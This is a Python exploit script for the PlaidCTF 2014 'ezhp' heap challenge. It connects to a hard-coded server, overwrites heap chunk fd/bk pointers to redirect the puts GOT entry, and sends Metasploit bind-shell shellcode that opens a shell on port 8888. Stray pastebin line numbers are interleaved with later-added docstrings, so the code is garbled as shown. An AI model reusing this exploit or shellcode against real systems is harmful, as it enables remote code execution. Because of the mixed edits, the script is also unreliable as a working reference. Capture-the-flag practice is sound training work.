
pwn200 ezhp by Danux

  1. #Author: Danux Mitnick
  2. #Description: Pwn200 PlaidCTF 2014
  3. #Date: Apr 13th 2014
  4.  
  5. import socket, time, struct
  6.  
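def sock_recv(s, n):
  """Wait briefly, then read up to *n* bytes from socket *s*, echo and return them.

  The fixed 0.25 s sleep only gives the remote side time to finish writing
  before the read; it is not a real synchronisation.  A single recv() may
  return fewer than *n* bytes (or b'' once the peer has closed), so the
  caller gets whatever happened to be available, not a guaranteed length.

  Args:
    s: a connected socket.
    n: maximum number of bytes to read.

  Returns:
    The bytes read (empty on a closed peer).
  """
  time.sleep(0.25)
  b = s.recv(n)
  # Parenthesised form is valid on both Python 2 and 3; the original
  # `print b` statement is a SyntaxError under Python 3.
  print(b)
  return b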
  12.  
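def DoData(s, data):
  """Send *data* on *s*, then read and echo the server's reply.

  The reply (whatever sock_recv() collected, up to 8096 bytes) is returned
  so callers can inspect it; the original assigned it to an unused local
  and dropped it, leaving no way to notice an unexpected response.

  Args:
    s: a connected socket.
    data: the bytes/str to send as the note body.

  Returns:
    The reply read back via sock_recv().
  """
  s.send(data)
  return sock_recv(s, 8096)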
  16.  
def DoRun(s,n):
  """Send the menu choice *n* as a decimal line on *s* and return the reply.

  The choice is formatted as '%d\\n'; the reply is read (up to 1024 bytes)
  and echoed by sock_recv().
  """
  line = '%d\n'%n
  s.send(line)
  return sock_recv(s, 1024)
  21.  
s = socket.socket()
# Endpoint of the 2014 challenge server is hard-coded (see the header
# comment); the script takes no host/port argument.
s.connect(('54.81.149.239', 9174))#54.81.149.239:9174
# Pause so a debugger can be attached to the remote process before any
# traffic is sent.
raw_input('Attach process with gdb here')
b = sock_recv(s, 1024)  # initial banner / menu, echoed by sock_recv()

# Menu interaction: each DoRun() sends one decimal choice and echoes the
# reply.  The author's inline labels give the meaning of the choices
# (3 = change note, 2 = delete note, 4 = print note); each "1, <size>" pair
# creates a note and the label records the id it received.
DoRun(s,1) #id 0
DoRun(s,256)
DoRun(s,1) #id 1
DoRun(s,256)
DoRun(s,1) #id 2
DoRun(s,256)
DoRun(s,3) #change note
DoRun(s,1) #id 1
DoRun(s,276)
#Now input your data
# Two 0xfffffffc words plus the two pointers below; with the 260-byte body
# this is exactly the 276 bytes announced by the previous DoRun().
sizes = "\xfc\xff\xff\xff"*2
fd = "\x08\xa0\x04\x08" # readelf --relocs ezhp ->0804a008 puts
bk = "\x60\xa0\x04\x08" #chunk_buffers holding heap addresses
sc = 'A'*260 + sizes + fd + bk
DoData(s,sc) #overwrite fd and bk headers of chunk id 2
DoRun(s,2) #id 2 - delete note of corrupted heap
DoRun(s,2)
DoRun(s,3) #change note
DoRun(s,1) #id 1 -> Now is pointing to heap addresses buffer
DoRun(s,256) #size
#Now input your data
sc = '\x0C\xa0\x04\x08' + "\x90"*10
#msfpayload linux/x86/shell_bind_tcp LPORT=8888 P
# Shellcode bytes kept verbatim from the original paste; the msfpayload
# line above records how they were generated.
sc2 =(
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
"\x80\x5b\x5e\x52\x68\x02\x00\x22\xb8\x6a\x10\x51\x50\x89"
"\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd"
"\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49"
"\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
sc = sc + sc2

DoData(s,sc) #overwrite stack at 0804a008 - 0x114  - puts
# NOTE(review): nothing below checks any reply; sock_recv() only echoes, so
# a deviation from the expected sequence (different ids, a rejected size,
# a closed connection) goes unnoticed and the script simply continues.
DoRun(s,4) #id 1 - print note 1 which is pointing to overwritten puts address
DoRun(s,1)
  63.  